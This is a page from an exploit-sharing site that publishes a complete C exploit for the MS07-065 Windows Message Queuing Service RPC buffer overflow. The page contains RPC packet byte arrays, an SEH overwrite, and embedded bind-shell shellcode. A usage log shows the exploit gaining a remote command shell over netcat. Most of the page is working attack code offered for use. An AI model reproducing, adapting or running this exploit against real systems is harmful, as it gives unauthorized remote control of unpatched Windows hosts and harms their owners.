0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MS Windows Message Queuing Service RPC BOF Exploit (MS07-065)
============================================================= MS Windows Message Queuing Service RPC BOF Exploit (MS07-065) ============================================================= /* Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065) by axis http://www.ph4nt0m.org you should know the dnsname of target to trigger this vuln the service runs on port 2103/2105/2107 D:\soft\develop\MyProjects\temp\Debug>temp.exe -h 192.168.152.100 -p 2103 -------------------------------------------------------------------------- -== Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065) ==- -== code by axis@ph4nt0m ==- -== Http://www.ph4nt0m.org ==- -== Tested against Windows 2000 server SP4 ==- -------------------------------------------------------------------------- [+] Attacking default port 2103 [*]Sending our Payload, Good Luck! ^_^ [*]Sending RPC Bind String! [*]Sending RPC Request Now! D:\soft\develop\MyProjects\temp\Debug> D:\>nc -vv -n 192.168.152.100 1154 (UNKNOWN) [192.168.152.100] 1154 (?) open: unknown socket error Microsoft Windows 2000 [Version 5.00.2195] (C) ???? 1985-2000 Microsoft Corp. C:\WINNT\system32>exit exit sent 5, rcvd 109: NOTSOCK D:\> */ #include <stdio.h> #include <stdlib.h> #include <ctype.h> #include <winsock.h> #include <io.h> #pragma comment(lib,"ws2_32") // RPC Bind UUID: fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0 char bind_str[] = { 0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0xd0, 0x16, 0xd0, 0x16, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11, 0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25, 0x01, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00 }; // RPC Request Opnum: 0x06 char request_1[] = { 0x05, 0x00, 0x00, 0x81, 0x10, 0x00, 0x00, 0x00, 0xd0, 0x16, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x98, 0x17, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11, 0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25, 0x01, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00, 0x61, 0x00, 0x2d, 0x00, 0x64, 0x00, 0x64, 0x00, // target's dns name (unicode) 0x61, 0x00, 0x34, 0x00, 0x31, 0x00, 0x33, 0x00, 0x39, 0x00, 0x38, 0x00, 0x66, 0x00, 0x34, 0x00, 0x34, 0x00, 0x66, 0x00, 0x34, 0x00, 0x2e, 0x00, 0x66, 0x00, 0x75, 0x00, 0x63, 0x00, 0x6b, 0x00, 0x5c, 0x00, 0x00, 0xcc, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xeb, 0x06, 0x42, 0x42, 0x32, 0xb0, // \xeb\x06\x42\x42 jmpcode 0x01, 0x78, 0x2b, 0xc9, 0x83, 0xe9, 0xb0, 0xd9, // overwrite seh ; call ebx 0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, // bindshell on port 1154, metasploit shellcode 0x13, 0x1d, 0x82, 0x67, 0xb4, 0x83, 0xeb, 0xfc, 0xe2, 0xf4, 0xe1, 0xe8, 0x8c, 0xf9, 0xf5, 0x7b, 0x98, 0x4b, 0xe2, 0xe2, 0xec, 0xd8, 0x39, 0xa6, 0xec, 0xf1, 0x21, 0x09, 0x1b, 0xb1, 0x65, 0x83, 0x88, 0x3f, 0x52, 0x9a, 0xec, 0xeb, 0x3d, 0x83, 0x8c, 0xfd, 0x96, 0xb6, 0xec, 0xb5, 0xf3, 0xb3, 0xa7, 0x2d, 0xb1, 0x06, 0xa7, 0xc0, 0x1a, 0x43, 0xad, 0xb9, 0x1c, 0x40, 0x8c, 0x40, 0x26, 0xd6, 0x43, 0x9c, 0x68, 0x67, 0xec, 0xeb, 0x39, 0x83, 0x8c, 0xd2, 0x96, 0x8e, 0x2c, 0x3f, 0x42, 0x9e, 0x66, 0x5f, 0x1e, 0xae, 0xec, 0x3d, 0x71, 0xa6, 0x7b, 0xd5, 0xde, 0xb3, 0xbc, 0xd0, 0x96, 0xc1, 0x57, 0x3f, 0x5d, 0x8e, 0xec, 0xc4, 0x01, 0x2f, 0xec, 0xf4, 0x15, 0xdc, 0x0f, 0x3a, 0x53, 0x8c, 0x8b, 0xe4, 0xe2, 0x54, 0x01, 0xe7, 0x7b, 0xea, 0x54, 0x86, 0x75, 0xf5, 0x14, 0x86, 0x42, 0xd6, 0x98, 0x64, 0x75, 0x49, 0x8a, 0x48, 0x26, 0xd2, 0x98, 0x62, 0x42, 0x0b, 0x82, 0xd2, 0x9c, 0x6f, 0x6f, 0xb6, 0x48, 0xe8, 0x65, 0x4b, 0xcd, 0xea, 0xbe, 0xbd, 0xe8, 0x2f, 0x30, 0x4b, 0xcb, 0xd1, 0x34, 0xe7, 0x4e, 0xd1, 0x24, 0xe7, 0x5e, 0xd1, 0x98, 0x64, 0x7b, 0xea, 0x63, 0x36, 0x7b, 0xd1, 0xee, 0x55, 0x88, 0xea, 0xc3, 0xae, 0x6d, 0x45, 0x30, 0x4b, 0xcb, 0xe8, 0x77, 0xe5, 0x48, 0x7d, 0xb7, 0xdc, 0xb9, 0x2f, 0x49, 0x5d, 0x4a, 0x7d, 0xb1, 0xe7, 0x48, 0x7d, 0xb7, 0xdc, 0xf8, 0xcb, 0xe1, 0xfd, 0x4a, 0x7d, 0xb1, 0xe4, 0x49, 0xd6, 0x32, 0x4b, 0xcd, 0x11, 0x0f, 0x53, 0x64, 0x44, 0x1e, 0xe3, 0xe2, 0x54, 0x32, 0x4b, 0xcd, 0xe4, 0x0d, 0xd0, 0x7b, 0xea, 0x04, 0xd9, 0x94, 0x67, 0x0d, 0xe4, 0x44, 0xab, 0xab, 0x3d, 0xfa, 0xe8, 0x23, 0x3d, 0xff, 0xb3, 0xa7, 0x47, 0xb7, 0x7c, 0x25, 0x99, 0xe3, 0xc0, 0x4b, 0x27, 0x90, 0xf8, 0x5f, 0x1f, 0xb6, 0x29, 0x0f, 0xc6, 0xe3, 0x31, 0x71, 0x4b, 0x68, 0xc6, 0x98, 0x62, 0x46, 0xd5, 0x35, 0xe5, 0x4c, 0xd3, 0x0d, 0xb5, 0x4c, 0xd3, 0x32, 0xe5, 0xe2, 0x52, 0x0f, 0x19, 0xc4, 0x87, 0xa9, 0xe7, 0xe2, 0x54, 0x0d, 0x4b, 0xe2, 0xb5, 0x98, 0x64, 0x96, 0xd5, 0x9b, 0x37, 0xd9, 0xe6, 0x98, 0x62, 0x4f, 0x7d, 0xb7, 0xdc, 0xf2, 0x4c, 0x87, 0xd4, 0x4e, 0x7d, 0xb1, 0x4b, 0xcd, 0x82, 0x67, 0xb4, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41}; char request_2[] = { 0x05, 0x00, 0x00, 0x82, 0x10, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11, 0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; void usage(char *argv) { printf(" Usage: %s -h 127.0.0.1 (Universal exploit)\n",argv); printf(" %s -h host [-p port]\n",argv); printf(" Targets:\n"); exit(1); } /************* TCP connect *************************/ void Disconnect(SOCKET s); // ripped from isno int Make_Connection(char *address,int port,int timeout) { struct sockaddr_in target; SOCKET s; int i; DWORD bf; fd_set wd; struct timeval tv; s = socket(AF_INET,SOCK_STREAM,0); if(s<0) return -1; target.sin_family = AF_INET; target.sin_addr.s_addr = inet_addr(address); if(target.sin_addr.s_addr==0) { closesocket(s); return -2; } target.sin_port = htons((short)port); bf = 1; ioctlsocket(s,FIONBIO,&bf); tv.tv_sec = timeout; tv.tv_usec = 0; FD_ZERO(&wd); FD_SET(s,&wd); connect(s,(struct sockaddr *)&target,sizeof(target)); if((i=select(s+1,0,&wd,0,&tv))==(-1)) { closesocket(s); return -3; } if(i==0) { closesocket(s); return -4; } i = sizeof(int); getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i); if((bf!=0)||(i!=sizeof(int))) { closesocket(s); return -5; } ioctlsocket(s,FIONBIO,&bf); return s; } void Disconnect(SOCKET s) { closesocket(s); WSACleanup(); } /****************************************************/ int main(int argc, char * argv[]){ unsigned char * target = NULL; int port = 2103; int i; int ret; char buffer[6000] = {0}; SOCKET s; WSADATA WSAData; printf("--------------------------------------------------------------------------\n"); printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) ==-\n"); printf("-== code by axis@ph4nt0m ==-\n"); printf("-== Http://www.ph4nt0m.org ==-\n"); printf("-== Tested against Windows 2000 server SP4 ==-\n"); printf("--------------------------------------------------------------------------\n\n"); if (argc==1) usage(argv[0]); //Handle parameters for(i=1;i<argc;i++) { if ( (argv[i][0]=='-') ) { switch (argv[i][1]) { case 'h': target=(unsigned char *)argv[i+1]; break; case 'p': if (strcmp(argv[i+1],"2103")==0) { printf("[+] Attacking default port 2103\n"); } else { port=atoi(argv[i+1]); } break; default: printf("[-] Invalid argument: %s\n",argv[i]); usage(argv[0]); break; } i++; } else usage(argv[0]); } /********************** attack payload ***************************/ if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0) { fprintf(stderr, "[-] WSAStartup failed.\n"); WSACleanup(); exit(1); } //Sleep(1200); s = Make_Connection((char *)target, port, 10); if(s<0) { fprintf(stderr, "[-] connect err.\n"); exit(1); } //Send our evil Payload printf("[*]Sending our Payload, Good Luck! ^_^\n"); printf("[*]Sending RPC Bind String!\n"); send(s, bind_str, sizeof(bind_str), 0); Sleep(1000); printf("[*]Sending RPC Request Now!\n"); memset(buffer, '\x41', sizeof(buffer)); // fil the buffer to trigger seh send(s, request_1, sizeof(request_1), 0); send(s, buffer, 5104, 0); // fil the buffer to trigger seh send(s, request_2, sizeof(request_2), 0); Sleep(100); memset(buffer, 0, sizeof(buffer)); ret = recv(s, buffer, sizeof(buffer)-1, 0); //printf("recv: %s\n", buffer); Disconnect(s); return 0; } # 0day.today [2024-12-25] #